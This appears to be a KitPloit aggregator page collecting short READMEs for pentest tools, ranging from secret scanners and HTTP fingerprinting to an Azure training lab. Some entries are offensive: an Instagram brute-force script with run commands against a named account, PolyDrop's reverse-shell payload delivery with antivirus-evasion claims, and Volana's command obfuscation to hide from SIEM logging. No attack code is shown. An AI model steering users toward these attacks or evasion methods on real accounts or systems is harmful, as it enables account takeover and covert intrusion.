Credits



☐ β˜† βœ‡ KitPloit - PenTest Tools!

TruffleHog Explorer - A User-Friendly Web-Based Tool To Visualize And Analyze Data Extracted Using TruffleHog

By: Unknown β€” April 18th 2025 at 12:30


Welcome to TruffleHog Explorer, a user-friendly web-based tool to visualize and analyze data extracted using TruffleHog. TruffleHog is one of the most powerful open source tools for secrets discovery, classification, validation, and analysis. In this context, a secret refers to a credential a machine uses to authenticate itself to another machine. This includes API keys, database passwords, private encryption keys, and more.

With an improved UI/UX, powerful filtering options, and export capabilities, this tool helps security professionals efficiently review potential secrets and credentials found in their repositories.

⚠️ This dashboard has been tested only with GitHub TruffleHog JSON outputs. Expect updates soon to support additional formats and platforms.

You can use the online version here: TruffleHog Explorer


πŸš€ Features

  • Intuitive UI/UX: Beautiful pastel theme with smooth navigation.
  • Powerful Filtering:
  • Filter findings by repository, detector type, and uploaded file.
  • Flexible date range selection with a calendar picker.
  • Verification status categorization for effective review.
  • Advanced search capabilities for faster identification.
  • Batch Operations:
  • Verify or reject multiple findings with a single click.
  • Toggle visibility of rejected results for a streamlined view.
  • Bulk processing to manage large datasets efficiently.
  • Export Capabilities:
  • Export verified secrets or filtered findings effortlessly.
  • Save and load session backups for continuity.
  • Generate reports in multiple formats (JSON, CSV).
  • Dynamic Sorting:
  • Sort results by repository, date, or verification status.
  • Customizable sorting preferences for a personalized experience.

πŸ“₯ Installation & Usage

1. Clone the Repository

$ git clone https://github.com/yourusername/trufflehog-explorer.git
$ cd trufflehog-explorer

2. Open the index.html

Simply open the index.html file in your preferred web browser.

$ open index.html

πŸ“‚ How to Use

  1. Upload TruffleHog JSON Findings:
    • Click on the "Load Data" section and select your .json files from TruffleHog output.
    • Multiple files are supported.
  2. Apply Filters:
    • Choose filters such as repository, detector type, and verification status.
    • Utilize the date range picker to narrow down findings.
    • Leverage the search function to locate specific findings quickly.
  3. Review Findings:
    • Click on a finding to expand and view its details.
    • Use the action buttons to verify or reject findings.
    • Add comments and annotations for better tracking.
  4. Export Results:
    • Export verified or filtered findings for reporting.
    • Save session data for future review and analysis.
  5. Save Your Progress:
    • Save your session and resume later without losing any progress.
    • Automatic backup feature to prevent data loss.

Happy Securing! πŸ”’



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Wappalyzer-Next - Python library that uses Wappalyzer extension (and its fingerprints) to detect technologies

By: Unknown β€” April 16th 2025 at 12:30


This project is a command line tool and Python library that uses the Wappalyzer extension (and its fingerprints) to detect technologies. Other projects that emerged after the discontinuation of the official open source project use outdated fingerprints and lack accuracy when used on dynamic web apps; this project bypasses those limitations.


Installation

Before installing wappalyzer, you will need to install Firefox and geckodriver. Below are detailed steps for setting up geckodriver, but you may use Google/YouTube for help.

Setting up geckodriver

Step 1: Download GeckoDriver

  1. Visit the official GeckoDriver releases page on GitHub:
    https://github.com/mozilla/geckodriver/releases
  2. Download the version compatible with your system:
    • For Windows: geckodriver-vX.XX.X-win64.zip
    • For macOS: geckodriver-vX.XX.X-macos.tar.gz
    • For Linux: geckodriver-vX.XX.X-linux64.tar.gz
  3. Extract the downloaded file to a folder of your choice.

Step 2: Add GeckoDriver to the System Path

To ensure Selenium can locate the GeckoDriver executable:

  • Windows:
    1. Move geckodriver.exe to a directory (e.g., C:\WebDrivers\).
    2. Add this directory to the system's PATH:
      • Open Environment Variables.
      • Under System Variables, find and select the Path variable, then click Edit.
      • Click New and enter the directory path where geckodriver.exe is stored.
      • Click OK to save.
  • macOS/Linux:
    1. Move the geckodriver file to /usr/local/bin/ or another directory in your PATH:
sudo mv geckodriver /usr/local/bin/
    2. Ensure /usr/local/bin/ is in your PATH.

Install as a command-line tool

pipx install wappalyzer

Install as a library

To use it as a library, install it with pip inside an isolated environment, e.g. venv or docker. You may also pass --break-system-packages to do a 'regular' install, but it is not recommended.

Install with docker

Steps

  1. Clone the repository:
git clone https://github.com/s0md3v/wappalyzer-next.git
cd wappalyzer-next
  2. Build and run with Docker Compose:
docker compose up -d
  3. Scan URLs using the Docker container:
    • Scan a single URL:
docker compose run --rm wappalyzer -i https://example.com
    • Scan multiple URLs from a file:
docker compose run --rm wappalyzer -i urls.txt -oJ output.json

For Users

Some common usage examples are given below; refer to the list of all options for more information.

  • Scan a single URL: wappalyzer -i https://example.com
  • Scan multiple URLs from a file: wappalyzer -i urls.txt -t 10
  • Scan with authentication: wappalyzer -i https://example.com -c "sessionid=abc123; token=xyz789"
  • Export results to JSON: wappalyzer -i https://example.com -oJ results.json

Options

Note: For accuracy use 'full' scan type (default). 'fast' and 'balanced' do not use browser emulation.

  • -i: Input URL or file containing URLs (one per line)
  • --scan-type: Scan type (default: 'full')
  • fast: Quick HTTP-based scan (sends 1 request)
  • balanced: HTTP-based scan with more requests
  • full: Complete scan using wappalyzer extension
  • -t, --threads: Number of concurrent threads (default: 5)
  • -oJ: JSON output file path
  • -oC: CSV output file path
  • -oH: HTML output file path
  • -c, --cookie: Cookie header string for authenticated scans

For Developers

The Python library is available on PyPI as wappalyzer and can be imported with the same name.

Using the Library

The main function you'll interact with is analyze():

from wappalyzer import analyze

# Basic usage
results = analyze('https://example.com')

# With options
results = analyze(
    url='https://example.com',
    scan_type='full',  # 'fast', 'balanced', or 'full'
    threads=3,
    cookie='sessionid=abc123'
)

analyze() Function Parameters

  • url (str): The URL to analyze
  • scan_type (str, optional): Type of scan to perform
  • 'fast': Quick HTTP-based scan
  • 'balanced': HTTP-based scan with more requests
  • 'full': Complete scan including JavaScript execution (default)
  • threads (int, optional): Number of threads for parallel processing (default: 3)
  • cookie (str, optional): Cookie header string for authenticated scans

Return Value

Returns a dictionary with the URL as key and detected technologies as value:

{
    "https://github.com": {
        "Amazon S3": {"version": "", "confidence": 100, "categories": ["CDN"], "groups": ["Servers"]},
        "lit-html": {"version": "1.1.2", "confidence": 100, "categories": ["JavaScript libraries"], "groups": ["Web development"]},
        "React Router": {"version": "6", "confidence": 100, "categories": ["JavaScript frameworks"], "groups": ["Web development"]}
    },
    "https://google.com": {},
    "https://example.com": {}
}

FAQ

Why use Firefox instead of Chrome?

Firefox extensions are .xpi files which are essentially zip files. This makes it easier to extract data and slightly modify the extension to make this tool work.

What is the difference between 'fast', 'balanced', and 'full' scan types?

  • fast: Sends a single HTTP request to the URL. Doesn't use the extension.
  • balanced: Sends additional HTTP requests to .js files and /robots.txt, and does DNS queries. Doesn't use the extension.
  • full: Uses the official Wappalyzer extension to scan the URL in a headless browser.


☐ β˜† βœ‡ KitPloit - PenTest Tools!

Instagram-Brute-Force-2024 - Instagram Brute Force 2024 Compatible With Python 3.13 / X64 Bit / Only Chrome Browser

By: Unknown β€” April 13th 2025 at 12:30


Instagram Brute Force CPU/GPU Supported 2024

(Use option 2 while running the script.)

(Option 1 is under development.)

(Chrome must be installed on the device.)

Compatible and Tested (GUI Supported Operating Systems Only)

Python 3.13 x64 bit Unix / Linux / Mac / Windows 8.1 and higher


Install Requirements

pip install -r requirements.txt

How to run

python3 instagram_brute_force.py [instagram_username_without_hashtag]
python3 instagram_brute_force.py mrx161


☐ β˜† βœ‡ KitPloit - PenTest Tools!

PolyDrop - A BYOSI (Bring-Your-Own-Script-Interpreter) Rapid Payload Deployment Toolkit

By: Unknown β€” September 23rd 2024 at 11:30


BYOSI

- Bring-Your-Own-Script-Interpreter

- Leveraging the abuse of trusted applications, one is able to deliver a compatible script interpreter for a Windows, Mac, or Linux system, as well as malicious source code in the form of the specific script interpreter of choice. Once both the malicious source code and the trusted script interpreter are safely written to the target system, one can simply execute said source code via the trusted script interpreter.

PolyDrop

- Leverages thirteen scripting languages to perform the above attack.


The following languages are wholly ignored by AV vendors, including MS-Defender:
  • tcl
  • php
  • crystal
  • julia
  • golang
  • dart
  • dlang
  • vlang
  • nodejs
  • bun
  • python
  • fsharp
  • deno

All of these languages were allowed by MS-Defender to fully execute and establish a reverse shell. We assume the list is even longer, given that languages such as PHP are considered "dead" languages.

- Currently undetectable by most mainstream Endpoint-Detection & Response vendors.

The total number of vendors that are unable to scan or process just PHP file types is 14, and they are listed below:

  • Alibaba
  • Avast-Mobile
  • BitDefenderFalx
  • Cylance
  • DeepInstinct
  • Elastic
  • McAfee Scanner
  • Palo Alto Networks
  • SecureAge
  • SentinelOne (Static ML)
  • Symantec Mobile Insight
  • Trapmine
  • Trustlook
  • Webroot

And the total number of vendors that are unable to accurately identify malicious PHP scripts is 54, and they are listed below:

  • Acronis (Static ML)
  • AhnLab-V3
  • ALYac
  • Antiy-AVL
  • Arcabit
  • Avira (no cloud)
  • Baidu
  • BitDefender
  • BitDefenderTheta
  • ClamAV
  • CMC
  • CrowdStrike Falcon
  • Cybereason
  • Cynet
  • DrWeb
  • Emsisoft
  • eScan
  • ESET-NOD32
  • Fortinet
  • GData
  • Gridinsoft (no cloud)
  • Jiangmin
  • K7AntiVirus
  • K7GW
  • Kaspersky
  • Lionic
  • Malwarebytes
  • MAX
  • MaxSecure
  • NANO-Antivirus
  • Panda
  • QuickHeal
  • Sangfor Engine Zero
  • Skyhigh (SWG)
  • Sophos
  • SUPERAntiSpyware
  • Symantec
  • TACHYON
  • TEHTRIS
  • Tencent
  • Trellix (ENS)
  • Trellix (HX)
  • TrendMicro
  • TrendMicro-HouseCall
  • Varist
  • VBA32
  • VIPRE
  • VirIT
  • ViRobot
  • WithSecure
  • Xcitium
  • Yandex
  • Zillya
  • ZoneAlarm by Check Point
  • Zoner

With this in mind, and given these vendors' absolute shortcomings in identifying PHP-based malware, we came up with the theory that the 13 identified languages are also an oversight by these vendors, including CrowdStrike, SentinelOne, Palo Alto, Fortinet, etc. We have been able to identify that, at the very least, Defender considers these obviously malicious payloads as plaintext.

Disclaimer

We as the maintainers, are in no way responsible for the misuse or abuse of this product. This was published for legitimate penetration testing/red teaming purposes, and for educational value. Know the applicable laws in your country of residence before using this script, and do not break the law whilst using this. Thank you and have a nice day.

EDIT

In case you are seeing all of the default declarations and wondering what's up: there is a reason. This was built to be more modular for later versions. For now, enjoy the tool and feel free to post issues. They'll be addressed as quickly as possible.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

ModTracer - ModTracer Finds Hidden Linux Kernel Rootkits And Then Make Visible Again

By: Unknown β€” September 15th 2024 at 11:30


ModTracer finds hidden Linux kernel rootkits and then makes them visible again.


Another way to make an LKM visible is using the imperius trick: https://github.com/MatheuZSecurity/Imperius



☐ β˜† βœ‡ KitPloit - PenTest Tools!

DockerSpy - DockerSpy Searches For Images On Docker Hub And Extracts Sensitive Information Such As Authentication Secrets, Private Keys, And More

By: Unknown β€” September 14th 2024 at 15:22


DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more.


What is Docker?

Docker is an open-source platform that automates the deployment, scaling, and management of applications using containerization technology. Containers allow developers to package an application and its dependencies into a single, portable unit that can run consistently across various computing environments. Docker simplifies the development and deployment process by ensuring that applications run the same way regardless of where they are deployed.

About Docker Hub

Docker Hub is a cloud-based repository where developers can store, share, and distribute container images. It serves as the largest library of container images, providing access to both official images created by Docker and community-contributed images. Docker Hub enables developers to easily find, download, and deploy pre-built images, facilitating rapid application development and deployment.

Why OSINT on Docker Hub?

Open Source Intelligence (OSINT) on Docker Hub involves using publicly available information to gather insights and data from container images and repositories hosted on Docker Hub. This is particularly important for identifying exposed secrets for several reasons:

  1. Security Audits: By analyzing Docker images, organizations can uncover exposed secrets such as API keys, authentication tokens, and private keys that might have been inadvertently included. This helps in mitigating potential security risks.

  2. Incident Prevention: Proactively searching for exposed secrets in Docker images can prevent security breaches before they happen, protecting sensitive information and maintaining the integrity of applications.

  3. Compliance: Ensuring that container images do not expose secrets is crucial for meeting regulatory and organizational security standards. OSINT helps verify that no sensitive information is unintentionally disclosed.

  4. Vulnerability Assessment: Identifying exposed secrets as part of regular security assessments allows organizations to address these vulnerabilities promptly, reducing the risk of exploitation by malicious actors.

  5. Enhanced Security Posture: Continuously monitoring Docker Hub for exposed secrets strengthens an organization's overall security posture, making it more resilient against potential threats.

Utilizing OSINT on Docker Hub to find exposed secrets enables organizations to enhance their security measures, prevent data breaches, and ensure the confidentiality of sensitive information within their containerized applications.

How DockerSpy Works

DockerSpy obtains information from Docker Hub and uses regular expressions to inspect the content for sensitive information, such as secrets.
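A minimal sketch of that approach (the patterns below are illustrative assumptions; DockerSpy ships its own configurable regular expressions):

import re

PATTERNS = {
    "AWS access key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "Private key header": re.compile(r"-----BEGIN (?:RSA|EC|OPENSSH) PRIVATE KEY-----"),
    "Generic API key": re.compile(r"(?i)api[_-]?key['\"]?\s*[:=]\s*['\"][0-9a-zA-Z]{16,}"),
}

def scan_text(text):
    # Yield (label, match) pairs for every suspicious hit in the given content.
    for label, pattern in PATTERNS.items():
        for match in pattern.finditer(text):
            yield label, match.group(0)

for label, secret in scan_text('aws_key = "AKIAABCDEFGHIJKLMNOP"'):
    print(label, secret)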

Getting Started

To use DockerSpy, follow these steps:

  1. Installation: Clone the DockerSpy repository and install the required dependencies.
git clone https://github.com/UndeadSec/DockerSpy.git && cd DockerSpy && make
  2. Usage: Run DockerSpy from the terminal.
dockerspy

Custom Configurations

To customize DockerSpy configurations, edit the following files:
  • Regular Expressions
  • Ignored File Extensions

Disclaimer

DockerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.

Contribution

Contributions to DockerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.

About the Author

DockerSpy is developed and maintained by Alisson Moretto (UndeadSec)

I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.

Consider following me:



Thanks

Special thanks to @akaclandestine



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Ashok - A OSINT Recon Tool, A.K.A Swiss Army Knife

By: Unknown β€” June 26th 2024 at 12:30


Reconnaissance is the first phase of penetration testing, which means gathering information before any real attacks are planned. Ashok is an incredibly fast recon tool for penetration testers, specially designed for the reconnaissance phase. In Ashok-v1.1 you can find the advanced Google dorker and wayback crawling machine.



Main Features

- Wayback Crawler Machine
- Google Dorking without limits
- Github Information Grabbing
- Subdomain Identifier
- Cms/Technology Detector With Custom Headers

Installation

~> git clone https://github.com/ankitdobhal/Ashok
~> cd Ashok
~> python3.7 -m pip install -r requirements.txt

How to use Ashok?

A detailed usage guide is available in the Usage section of the Wiki.

But an index of some options is given below:

Docker

Ashok can be launched using a lightweight Python3.8-Alpine Docker image.

$ docker pull powerexploit/ashok-v1.2
$ docker container run -it powerexploit/ashok-v1.2 --help


    Credits



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Hfinger - Fingerprinting HTTP Requests

    By: Unknown β€” June 24th 2024 at 12:30


    Tool for Fingerprinting HTTP requests of malware. Based on Tshark and written in Python3. Working prototype stage :-)

    Its main objective is to provide unique representations (fingerprints) of malware requests, which help in their identification. Unique means here that each fingerprint should be seen only in one particular malware family, yet one family can have multiple fingerprints. Hfinger represents the request in a shorter form than printing the whole request, but still human interpretable.

    Hfinger can be used in manual malware analysis but also in sandbox systems or SIEMs. The generated fingerprints are useful for grouping requests, pinpointing requests to particular malware families, identifying different operations of one family, or discovering unknown malicious requests omitted by other security systems but which share a fingerprint.

    An academic paper accompanies work on this tool, describing, for example, the motivation of design choices, and the evaluation of the tool compared to p0f, FATT, and Mercury.


      The idea

      The basic assumption of this project is that HTTP requests of different malware families are more or less unique, so they can be fingerprinted to provide some sort of identification. Hfinger retains information about the structure and values of some headers to provide means for further analysis. For example, grouping of similar requests - at this moment, it is still a work in progress.

      After analysis of malware's HTTP requests and headers, we have identified some parts of requests as being most distinctive. These include:
      • Request method
      • Protocol version
      • Header order
      • Popular headers' values
      • Payload length, entropy, and presence of non-ASCII characters

      Additionally, some standard features of the request URL were also considered. All these parts were translated into a set of features, described in detail here.

      The above features are translated into varying length representation, which is the actual fingerprint. Depending on report mode, different features are used to fingerprint requests. More information on these modes is presented below. The feature selection process will be described in the forthcoming academic paper.

      Installation

      Minimum requirements needed before installation:
      • Python >= 3.3
      • Tshark >= 2.2.0

      Installation available from PyPI:

      pip install hfinger

      Hfinger has been tested on Xubuntu 22.04 LTS with tshark package in version 3.6.2, but should work with older versions like 2.6.10 on Xubuntu 18.04 or 3.2.3 on Xubuntu 20.04.

      Please note that, as with any PoC, you should run Hfinger in a separate environment, at least within a Python virtual environment. Its setup is not covered here, but you can try this tutorial.

      Usage

      After installation, you can call the tool directly from a command line with hfinger or as a Python module with python -m hfinger.

      For example:

      foo@bar:~$ hfinger -f /tmp/test.pcap
      [{"epoch_time": "1614098832.205385000", "ip_src": "127.0.0.1", "ip_dst": "127.0.0.1", "port_src": "53664", "port_dst": "8080", "fingerprint": "2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4"}]

      Help can be displayed with short -h or long --help switches:

      usage: hfinger [-h] (-f FILE | -d DIR) [-o output_path] [-m {0,1,2,3,4}] [-v]
      [-l LOGFILE]

      Hfinger - fingerprinting malware HTTP requests stored in pcap files

      optional arguments:
      -h, --help show this help message and exit
      -f FILE, --file FILE Read a single pcap file
      -d DIR, --directory DIR
      Read pcap files from the directory DIR
      -o output_path, --output-path output_path
      Path to the output directory
      -m {0,1,2,3,4}, --mode {0,1,2,3,4}
      Fingerprint report mode.
      0 - similar number of collisions and fingerprints as mode 2, but using fewer features,
      1 - representation of all designed features, but a little more collisions than modes 0, 2, and 4,
      2 - optimal (the default mode),
      3 - the lowest number of generated fingerprints, but the highest number of collisions,
      4 - the highest fingerprint entropy, but slightly more fingerprints than modes 0-2
      -v, --verbose Report information about non-standard values in the request
      (e.g., non-ASCII characters, no CRLF tags, values not present in the configuration list).
      Without --logfile (-l) will print to the standard error.
      -l LOGFILE, --logfile LOGFILE
      Output logfile in the verbose mode. Implies -v or --verbose switch.

      You must provide a path to a pcap file (-f), or a directory (-d) with pcap files. The output is in JSON format. It will be printed to standard output or to the provided directory (-o) using the name of the source file. For example, output of the command:

      hfinger -f example.pcap -o /tmp/pcap

      will be saved to:

      /tmp/pcap/example.pcap.json

      Report mode -m/--mode can be used to change the default report mode by providing an integer in the range 0-4. The modes differ in the represented request features and rounding modes. The default mode (2) was chosen to represent all features that are usually used during requests' analysis, while also offering a low number of collisions and generated fingerprints. With other modes, you can achieve different goals. For example, in mode 3 you get a lower number of generated fingerprints but a higher chance of a collision between malware families. If you are unsure, you don't have to change anything. More information on report modes is here.

      Beginning with version 0.2.1, Hfinger is less verbose. You should use -v/--verbose if you want to receive information about encountered non-standard header values, non-ASCII characters in the non-payload part of the request, a lack of CRLF tags (\r\n\r\n), and other problems with analyzed requests that are not application errors. When any such issues are encountered in the verbose mode, they will be printed to the standard error output. You can also save the log to a defined location using the -l/--logfile switch (it implies -v/--verbose). The log data will be appended to the log file.

      Using hfinger in a Python application

      Beginning with version 0.2.0, Hfinger supports importing to other Python applications. To use it in your app simply import hfinger_analyze function from hfinger.analysis and call it with a path to the pcap file and reporting mode. The returned result is a list of dicts with fingerprinting results.

      For example:

      from hfinger.analysis import hfinger_analyze

      pcap_path = "SPECIFY_PCAP_PATH_HERE"
      reporting_mode = 4
      print(hfinger_analyze(pcap_path, reporting_mode))

      Beginning with version 0.2.1, Hfinger uses the logging module for logging information about encountered non-standard header values, non-ASCII characters in the non-payload part of the request, a lack of CRLF tags (\r\n\r\n), and other problems with analyzed requests that are not application errors. Hfinger creates its own logger using the name hfinger, but without prior configuration, the log information is in practice discarded. If you want to receive this log information, then before calling hfinger_analyze you should configure the hfinger logger, set the log level to logging.INFO, configure a log handler to your needs, and add it to the logger. More information is available in the hfinger_analyze function docstring.

      Fingerprint creation

      A fingerprint is based on features extracted from a request. Usage of particular features from the full list depends on the chosen report mode from a predefined list (more information on report modes is here). The figure below represents the creation of an exemplary fingerprint in the default report mode.

      Three parts of the request are analyzed to extract information: URI, headers' structure (including method and protocol version), and payload. Particular features of the fingerprint are separated using | (pipe). The final fingerprint generated for the POST request from the example is:

      2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4

      The creation of features is described below in the order of appearance in the fingerprint.

      Firstly, URI features are extracted:
      • URI length, represented as a logarithm base 10 of the length, rounded to an integer (in the example the URI is 43 characters long, so log10(43)≈2),
      • number of directories (in the example there are 3 directories),
      • average directory length, represented as a logarithm base 10 of the actual average length, rounded to an integer (in the example there are three directories with a total length of 20 characters (6+6+8), so log10(20/3)≈1),
      • extension of the requested file, but only if it is on the list of known extensions in hfinger/configs/extensions.txt,
      • average value length, represented as a logarithm base 10 of the actual average value length, rounded to one decimal point (in the example two values have the same length of 4 characters, so the average is 4, and log10(4)≈0.6).
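      To sanity-check the arithmetic in the example above (plain Python, not Hfinger's own code):

      from math import log10

      print(round(log10(43)))      # URI length feature -> 2
      print(round(log10(20 / 3)))  # average directory length (6+6+8 over 3 dirs) -> 1
      print(round(log10(4), 1))    # average value length (two 4-character values) -> 0.6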

      Secondly, header structure features are analyzed:
      • request method, encoded as the first two letters of the method (PO),
      • protocol version, encoded as an integer (1 for version 1.1, 0 for version 1.0, and 9 for version 0.9),
      • order of the headers,
      • popular headers and their values.

      To represent order of the headers in the request, each header's name is encoded according to the schema in hfinger/configs/headerslow.json, for example, User-Agent header is encoded as us-ag. Encoded names are separated by ,. If the header name does not start with an upper case letter (or any of its parts when analyzing compound headers such as Accept-Encoding), then encoded representation is prefixed with !. If the header name is not on the list of the known headers, it is hashed using FNV1a hash, and the hash is used as encoding.

      When analyzing popular headers, the request is checked for whether they appear in it. These headers are:
      • Connection
      • Accept-Encoding
      • Content-Encoding
      • Cache-Control
      • TE
      • Accept-Charset
      • Content-Type
      • Accept
      • Accept-Language
      • User-Agent

      When the header is found in the request, its value is checked against a table of typical values to create pairs of header_name_representation:value_representation. The name of the header is encoded according to the schema in hfinger/configs/headerslow.json (as presented before), and the value is encoded according to schema stored in hfinger/configs directory or configs.py file, depending on the header. In the above example Accept is encoded as ac and its value */* as as-as (asterisk-asterisk), giving ac:as-as. The pairs are inserted into fingerprint in order of appearance in the request and are delimited using /. If the header value cannot be found in the encoding table, it is hashed using the FNV1a hash.
      If the header value is composed of multiple values, they are tokenized to provide a list of values delimited with ,, for example, Accept: */*, text/* would give ac:as-as,te-as. However, at this point of development, if the header value contains a "quality value" tag (q=), then the whole value is encoded with its FNV1a hash. Finally, values of User-Agent and Accept-Language headers are directly encoded using their FNV1a hashes.
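      For reference, FNV1a is a small, well-known hash; a 32-bit Python version is sketched below (whether Hfinger uses the 32-bit or 64-bit variant is not stated here, so treat the width as an assumption):

      def fnv1a_32(data: bytes) -> int:
          h = 0x811C9DC5                    # FNV-1a 32-bit offset basis
          for byte in data:
              h ^= byte
              h = (h * 0x01000193) % 2**32  # multiply by the FNV prime, keep 32 bits
          return h

      print(f"{fnv1a_32(b'Mozilla/5.0'):08x}")  # hypothetical User-Agent value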

      Finally, the payload features:
      • presence of non-ASCII characters, represented with the letter N, and with A otherwise,
      • payload's Shannon entropy, rounded to an integer,
      • payload length, represented as a logarithm base 10 of the actual payload length, rounded to one decimal point.
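      These payload computations can be reproduced in a few lines of plain Python (a sketch of the description above, not Hfinger's own code):

      from collections import Counter
      from math import log2, log10

      def payload_features(payload: bytes) -> str:
          ascii_flag = "A" if all(b < 128 for b in payload) else "N"
          probs = [count / len(payload) for count in Counter(payload).values()]
          entropy = -sum(p * log2(p) for p in probs)  # Shannon entropy
          return f"{ascii_flag}|{round(entropy)}|{round(log10(len(payload)), 1)}"

      print(payload_features(b"a=1234&b=5678"))  # e.g. 'A|4|1.1'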

      Report modes

      Hfinger operates in five report modes, which differ in the features represented in the fingerprint, and thus in the information extracted from requests. These are (with the number used in the tool configuration):
      • mode 0: producing a similar number of collisions and fingerprints as mode 2, but using fewer features,
      • mode 1: representing all designed features, but producing a little more collisions than modes 0, 2, and 4,
      • mode 2: optimal (the default mode), representing all features which are usually used during requests' analysis, but also offering a low number of collisions and generated fingerprints,
      • mode 3: producing the lowest number of generated fingerprints of all modes, but achieving the highest number of collisions,
      • mode 4: offering the highest fingerprint entropy, but also generating slightly more fingerprints than modes 0-2.

      The modes were chosen in order to optimize Hfinger's capability to uniquely identify malware families versus the number of generated fingerprints. Modes 0, 2, and 4 offer a similar number of collisions between malware families; however, mode 4 generates a few more fingerprints than the other two. Mode 2 represents more request features than mode 0 with a comparable number of generated fingerprints and collisions. Mode 1 is the only one representing all designed features, but it increases the number of collisions almost two-fold compared to modes 0, 2, and 4. Mode 3 produces at least two times fewer fingerprints than the other modes, but it introduces about nine times more collisions. A description of all designed features is here.

      The modes consist of the following features (in the order of appearance in the fingerprint):
      • mode 0:
        • number of directories,
        • average directory length represented as an integer,
        • extension of the requested file,
        • average value length represented as a float,
        • order of headers,
        • popular headers and their values,
        • payload length represented as a float.
      • mode 1:
        • URI length represented as an integer,
        • number of directories,
        • average directory length represented as an integer,
        • extension of the requested file,
        • variable length represented as an integer,
        • number of variables,
        • average value length represented as an integer,
        • request method,
        • version of protocol,
        • order of headers,
        • popular headers and their values,
        • presence of non-ASCII characters,
        • payload entropy represented as an integer,
        • payload length represented as an integer.
      • mode 2:
        • URI length represented as an integer,
        • number of directories,
        • average directory length represented as an integer,
        • extension of the requested file,
        • average value length represented as a float,
        • request method,
        • version of protocol,
        • order of headers,
        • popular headers and their values,
        • presence of non-ASCII characters,
        • payload entropy represented as an integer,
        • payload length represented as a float.
      • mode 3:
        • URI length represented as an integer,
        • average directory length represented as an integer,
        • extension of the requested file,
        • average value length represented as an integer,
        • order of headers.
      • mode 4:
        • URI length represented as a float,
        • number of directories,
        • average directory length represented as a float,
        • extension of the requested file,
        • variable length represented as a float,
        • average value length represented as a float,
        • request method,
        • version of protocol,
        • order of headers,
        • popular headers and their values,
        • presence of non-ASCII characters,
        • payload entropy represented as a float,
        • payload length represented as a float.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      XMGoat - Composed of XM Cyber terraform templates that help you learn about common Azure security issues

      By: Unknown β€” June 22nd 2024 at 12:30


      XM Goat is composed of XM Cyber terraform templates that help you learn about common Azure security issues. Each template is a vulnerable environment, with some significant misconfigurations. Your job is to attack and compromise the environments.

      Here's what to do for each environment:

      1. Run installation and then get started.

      2. With the initial user and service principal credentials, attack the environment based on the scenario flow (for example, XMGoat/scenarios/scenario_1/scenario1_flow.png).

      3. If you need help with your attack, refer to the solution (for example, XMGoat/scenarios/scenario_1/solution.md).

      4. When you're done learning the attack, clean up.


      Requirements

      • Azure tenant
      • Terraform version 1.0.9 or above
      • Azure CLI
      • Azure User with Owner permissions on Subscription and Global Admin privileges in AAD

      Installation

      Run these commands:

      $ az login
      $ git clone https://github.com/XMCyber/XMGoat.git
      $ cd XMGoat
      $ cd scenarios
      $ cd scenario_<SCENARIO>

      Where <SCENARIO> is the scenario number you want to complete

      $ terraform init
      $ terraform plan -out <FILENAME>
      $ terraform apply <FILENAME>

      Where <FILENAME> is the name of the output file

      Get started

      To get the initial user and service principal credentials, run the following query:

      $ terraform output --json

      For Service Principals, use application_id.value and application_secret.value.

      For Users, use username.value and password.value.

      Cleaning up

      After completing the scenario, run the following command in order to clean all the resources created in your tenant

      $ az login
      $ cd XMGoat
      $ cd scenarios
      $ cd scenario_<SCENARIO>

      Where <SCENARIO> is the scenario number you want to complete

      $ terraform destroy


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Extrude - Analyse Binaries For Missing Security Features, Information Disclosure And More...

      By: Unknown β€” June 21st 2024 at 12:30


      Analyse binaries for missing security features, information disclosure and more.

      Extrude is in the early stages of development, and currently only supports ELF and MachO binaries. PE (Windows) binaries will be supported soon.


      Usage

      Usage:
      extrude [flags] [file]

      Flags:
      -a, --all Show details of all tests, not just those which failed.
      -w, --fail-on-warning Exit with a non-zero status even if only warnings are discovered.
      -h, --help help for extrude

      Docker

      You can optionally run extrude with docker via:

      docker run -v `pwd`:/blah -it ghcr.io/liamg/extrude /blah/targetfile

      Supported Checks

      ELF

      • PIE
      • RELRO
      • BIND NOW
      • Fortified Source
      • Stack Canary
      • NX Stack
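      For a sense of what the ELF checks above involve, here is a hedged Python sketch using pyelftools (an independent illustration, not extrude's own code):

      from elftools.elf.elffile import ELFFile
      from elftools.elf.constants import P_FLAGS

      def elf_checks(path):
          with open(path, "rb") as f:
              elf = ELFFile(f)
              segments = list(elf.iter_segments())
              dynsym = elf.get_section_by_name(".dynsym")
              return {
                  # PIE binaries are linked as position-independent shared objects
                  "PIE": elf.header["e_type"] == "ET_DYN",
                  # RELRO is signalled by a PT_GNU_RELRO segment
                  "RELRO": any(s["p_type"] == "PT_GNU_RELRO" for s in segments),
                  # NX stack: PT_GNU_STACK present and not executable
                  "NX stack": any(
                      s["p_type"] == "PT_GNU_STACK" and not (s["p_flags"] & P_FLAGS.PF_X)
                      for s in segments
                  ),
                  # Stack canary: the compiler references __stack_chk_fail
                  "Stack canary": dynsym is not None and any(
                      sym.name == "__stack_chk_fail" for sym in dynsym.iter_symbols()
                  ),
              }

      print(elf_checks("/bin/ls"))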

      MachO

      • PIE
      • Stack Canary
      • NX Stack
      • NX Heap
      • ARC

      Windows

      Coming soon...

      TODO

      • Add support for PE
      • Add secret scanning
      • Detect packers


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Volana - Shell Command Obfuscation To Avoid Detection Systems

      By: Unknown β€” June 19th 2024 at 12:30


      Shell command obfuscation to avoid SIEM/detection system

      During a pentest, an important aspect is to be stealthy. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log commands and send them to a SIEM in real time, making the after-the-fact cleaning useless.

